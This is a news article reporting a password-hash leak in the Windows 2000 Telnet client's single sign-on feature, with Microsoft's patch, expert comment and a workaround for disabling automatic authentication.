The problem involves the Windows 2000 Telnet client, a program that lets someone connect a PC to a network server and execute commands on a second machine remotely.
The security hole stems from Microsoft's convenient single sign-on feature that saves people the hassle of logging in for each Telnet session by automatically providing the required user ID and encrypted password.
Security experts warned that once an individual obtains an encrypted password, or "password hash," a password cracker can be used to determine the actual pass code.
Although Telnet is not a frequently used program, a password thief could steal passwords by embedding links in a Web page or an email that could launch a victim's Telnet program.
"The risk is that the malicious user can create or craft a document and send it to another user, and that action would initiate a connection to the remote Telnet user," said Eric Schultze, security program manager for Microsoft Security Response Centers. "The patch we are issuing later today will prompt the user and say, 'We're about to send your password to that remote server, do you want to continue?'"
Microsoft was first notified about the problem Aug. 1 by Boston-based Internet security company @Stake. The companies have worked together to produce the software patch.
The security bulletin will be posted to the Microsoft.com security Web site and will be sent to members of the Microsoft security-notification mailing list later today.
According to security expert Elias Levy, the vulnerability mirrors a similar problem Microsoft faced more than two years ago, when the company's Web browser, Internet Explorer, provided people with the same single sign-on feature.
When opening a Web site that was connected to a remote computer, IE would provide that computer with the person's user identification and password hash.
To address this problem, Microsoft released a patch that let people configure their control panel settings to either opt in or out of this feature.
"You could say, on my intranet, my company, I want Internet Explorer to automatically log me into servers, but on the Internet zone, I don't want it going out," said Levy, chief technology officer at the information security portal SecurityFocus.com. "Then it prompts you and asks you to input your username and password."
Levy said he knows of no instances where passwords have been stolen by the security vulnerability in Windows 2000 Telnet but says he can think of possible instances when they might be.
"If you're a criminal and you want to break into Company A and you have people's email addresses, you could send them email that would launch Telnet and try to get their passwords that way," he said.
Microsoft said that people concerned about their security can disable the feature, even before the patch is released, by disabling a default function that is set to authenticate a person's Telnet connection to a remote computer.